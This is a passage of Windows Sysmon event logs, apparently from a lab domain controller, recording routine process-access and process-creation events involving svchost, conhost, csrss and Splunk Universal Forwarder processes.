C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:55:40.597","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"732","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F73-5F25-0000-0010A2BC0200}","TargetProcessId":"2804","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:55:41","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:55:40","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":3796,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:55:40.597\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 732\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F73-5F25-0000-0010A2BC0200}\r\nTargetProcessId: 2804\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:55:40.597","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"732","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F73-5F25-0000-0010A2BC0200}","TargetProcessId":"2804","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:55:41","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:55:40","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":3797,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:55:40.597\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 732\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F73-5F25-0000-0010A2BC0200}\r\nTargetProcessId: 2804\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:55:40.597","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"732","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F73-5F25-0000-0010A2BC0200}","TargetProcessId":"2804","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:55:41","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:55:40","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":3798,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:55:40.597\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 732\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F73-5F25-0000-0010A2BC0200}\r\nTargetProcessId: 2804\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+d6ce|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:55:40.597","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"732","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F73-5F25-0000-0010A2BC0200}","TargetProcessId":"2804","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+d6ce|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:55:41","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:55:40","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":3799,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:55:40.597\r\nSourceProcessGUID: {41C8662E-1FF3-5F25-0000-001093590500}\r\nSourceProcessId: 4448\r\nSourceThreadId: 4424\r\nSourceImage: C:\\Windows\\system32\\conhost.exe\r\nTargetProcessGUID: {41C8662E-1FFC-5F25-0000-0010F4CB0500}\r\nTargetProcessId: 892\r\nTargetImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-MonitorNoHandle.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\SYSTEM32\\ConhostV2.dll+5c07|C:\\Windows\\SYSTEM32\\ConhostV2.dll+76ab|C:\\Windows\\SYSTEM32\\ConhostV2.dll+a84c|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:55:40.597","SourceProcessGUID":"{41C8662E-1FF3-5F25-0000-001093590500}","SourceProcessId":"4448","SourceThreadId":"4424","SourceImage":"C:\\Windows\\system32\\conhost.exe","TargetProcessGUID":"{41C8662E-1FFC-5F25-0000-0010F4CB0500}","TargetProcessId":"892","TargetImage":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-MonitorNoHandle.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\SYSTEM32\\ConhostV2.dll+5c07|C:\\Windows\\SYSTEM32\\ConhostV2.dll+76ab|C:\\Windows\\SYSTEM32\\ConhostV2.dll+a84c|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:55:41","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:55:41","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":1,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":5,"Task":1,"OpcodeValue":0,"RecordNumber":3800,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process Create:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:55:41.270\r\nProcessGuid: {41C8662E-1FFD-5F25-0000-0010B6CD0500}\r\nProcessId: 4620\r\nImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-admon.exe\r\nFileVersion: 8.0.2\r\nDescription: Active Directory monitor\r\nProduct: splunk Application\r\nCompany: Splunk Inc.\r\nOriginalFileName: splunk-admon.exe\r\nCommandLine: \"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-admon.exe\"\r\nCurrentDirectory: C:\\Windows\\system32\\\r\nUser: NT AUTHORITY\\SYSTEM\r\nLogonGuid: {41C8662E-1F61-5F25-0000-0020E7030000}\r\nLogonId: 0x3E7\r\nTerminalSessionId: 0\r\nIntegrityLevel: System\r\nHashes: MD5=947139F3BB2AB70CAF692A60C7A3A735,SHA256=940554A0170A70F634689CC84B00C51AC0BCF773C9639E1305E3672441FC85C8,IMPHASH=357CEC18833E7FF2ABFB722902B13165\r\nParentProcessGuid: {41C8662E-1FF3-5F25-0000-00109F540500}\r\nParentProcessId: 4576\r\nParentImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe\r\nParentCommandLine: \"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe\" service","Category":"Process Create (rule: ProcessCreate)","Opcode":"Info","UtcTime":"2020-08-01 07:55:41.270","ProcessGuid":"{41C8662E-1FFD-5F25-0000-0010B6CD0500}","Image":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-admon.exe","FileVersion":"8.0.2","Description":"Active Directory monitor","Product":"splunk Application","Company":"Splunk Inc.","OriginalFileName":"splunk-admon.exe","CommandLine":"\"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-admon.exe\"","CurrentDirectory":"C:\\Windows\\system32\\","User":"NT AUTHORITY\\SYSTEM","LogonGuid":"{41C8662E-1F61-5F25-0000-0020E7030000}","LogonId":"0x3e7","TerminalSessionId":"0","IntegrityLevel":"System","Hashes":"MD5=947139F3BB2AB70CAF692A60C7A3A735,SHA256=940554A0170A70F634689CC84B00C51AC0BCF773C9639E1305E3672441FC85C8,IMPHASH=357CEC18833E7FF2ABFB722902B13165","ParentProcessGuid":"{41C8662E-1FF3-5F25-0000-00109F540500}","ParentProcessId":"4576","ParentImage":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe","ParentCommandLine":"\"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe\" service","EventReceivedTime":"2020-08-01 07:55:41","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:55:41","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":3801,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:55:41.270\r\nSourceProcessGUID: {41C8662E-1FF3-5F25-0000-00109F540500}\r\nSourceProcessId: 4576\r\nSourceThreadId: 2580\r\nSourceImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe\r\nTargetProcessGUID: {41C8662E-1FF3-5F25-0000-00107C4D0500}\r\nTargetProcessId: 4620\r\nTargetImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-admon.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+ce6a3b|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+17cade|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+18641d|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+17ef16|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+c992c4|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+18689b|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+189d3c|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+c95f5f|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+c99fad|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+184c5b|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+c7dd7e|C:\\Windows\\System32\\ucrtbase.dll+1fb80|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:55:41.270","SourceProcessGUID":"{41C8662E-1FF3-5F25-0000-00109F540500}","SourceProcessId":"4576","SourceThreadId":"2580","SourceImage":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe","TargetProcessGUID":"{41C8662E-1FF3-5F25-0000-00107C4D0500}","TargetProcessId":"4620","TargetImage":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-admon.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+ce6a3b|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+17cade|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+18641d|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+17ef16|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+c992c4|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+18689b|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+189d3c|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+c95f5f|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+c99fad|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+184c5b|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+c7dd7e|C:\\Windows\\System32\\ucrtbase.dll+1fb80|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:55:41","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:55:41","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":3802,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:55:41.270\r\nSourceProcessGUID: {41C8662E-1F61-5F25-0000-0010E7420000}\r\nSourceProcessId: 648\r\nSourceThreadId: 1148\r\nSourceImage: C:\\Windows\\system32\\csrss.exe\r\nTargetProcessGUID: {41C8662E-1FF3-5F25-0000-00107C4D0500}\r\nTargetProcessId: 4620\r\nTargetImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-admon.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:55:41.270","SourceProcessGUID":"{41C8662E-1F61-5F25-0000-0010E7420000}","SourceProcessId":"648","SourceThreadId":"1148","SourceImage":"C:\\Windows\\system32\\csrss.exe","TargetProcessGUID":"{41C8662E-1FF3-5F25-0000-00107C4D0500}","TargetProcessId":"4620","TargetImage":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-admon.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","EventReceivedTime":"2020-08-01 07:55:41","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:55:41","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":3803,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:55:41.270\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 732\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F73-5F25-0000-0010A2BC0200}\r\nTargetProcessId: 2804\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:55:41.270","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"732","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F73-5F25-0000-0010A2BC0200}","TargetProcessId":"2804","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:55:41","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
